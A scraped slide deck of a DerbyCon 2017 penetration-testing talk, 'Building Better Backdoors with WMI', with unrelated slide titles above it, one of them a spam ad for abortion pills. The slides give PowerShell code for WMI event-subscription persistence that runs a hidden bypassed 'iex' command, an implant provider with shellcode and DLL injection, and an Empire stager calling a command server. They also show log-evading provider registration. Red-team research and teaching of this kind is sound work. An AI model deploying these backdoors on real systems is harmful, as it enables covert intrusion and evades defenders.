Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 

Building Better Backdoors with WMI - DerbyCon 2017

  • 2. 2 Confidential & Proprietary WHO AM I  Alexander Polce Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
  • 3. 3 Confidential & Proprietary OUTLINE 1. WMI Overview 2. Fileless Backdoors 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
  • 4. 4 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
  • 5. 5 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
  • 6. 6 Confidential & Proprietary6 Confidential & Proprietary FILELESS BACKDOORS INVOKE-WMIDUPLICATECLASS
  • 7. 7 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
  • 8. 8 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
  • 9. 9 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
  • 10. 10 Confidential & Proprietary
  • 11. 11 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
  • 12. 12 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 13. 13 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 14. 14 Confidential & Proprietary
  • 15. 15 Confidential & Proprietary15 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
  • 16. 16 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
  • 17. 17 Confidential & Proprietary
  • 18. 18 Confidential & Proprietary18 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
  • 19. 19 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
  • 20. 20 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators to a class and your done  [ManagementEntity]  [ManagementTask] https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885
  • 21. 21 Confidential & Proprietary BASIC BACKDOOR  Command Execution  ShellCode Runner  Dll Injector  PE Injector https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider https://github.com/subTee/EvilWMIProvider
  • 22. 22 Confidential & Proprietary
  • 23. 23 Confidential & Proprietary BASIC WMI BACKDOOR
  • 24. 24 Confidential & Proprietary
  • 25. 25 Confidential & Proprietary BETTER WMI BACKDOOR  Store Payload as Base64 Encoded String in WMI, and then inject the payload  ShellCode Runner  Dll Injector  PE Injector
  • 26. 26 Confidential & Proprietary BETTER WMI BACKDOOR
  • 27. 27 Confidential & Proprietary
  • 28. 28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Stager? Why not? $language = “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  • 29. 29 Confidential & Proprietary EMPIRE – POWERSHELL AGENT
  • 30. 30 Confidential & Proprietary
  • 31. 31 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  • 32. 32 Confidential & Proprietary EMPIRE - .NET AGENT
  • 33. 33 Confidential & Proprietary33 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
  • 34. 34 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
  • 35. 35 Confidential & Proprietary
  • 36. 36 Confidential & Proprietary
  • 37. 37 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
  • 38. 38 Confidential & Proprietary
  • 39. 39 Confidential & Proprietary
  • 40. 40 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
  • 41. 41 Confidential & Proprietary MANUAL REGISTRATION That looks hard
  • 42. 42 Confidential & Proprietary MANUAL REGISTRATION It was
  • 43. 43 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
  • 44. 44 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
  • 45. 45 Confidential & Proprietary
  • 46. 46 Confidential & Proprietary
  • 47. 47 Confidential & Proprietary Questions?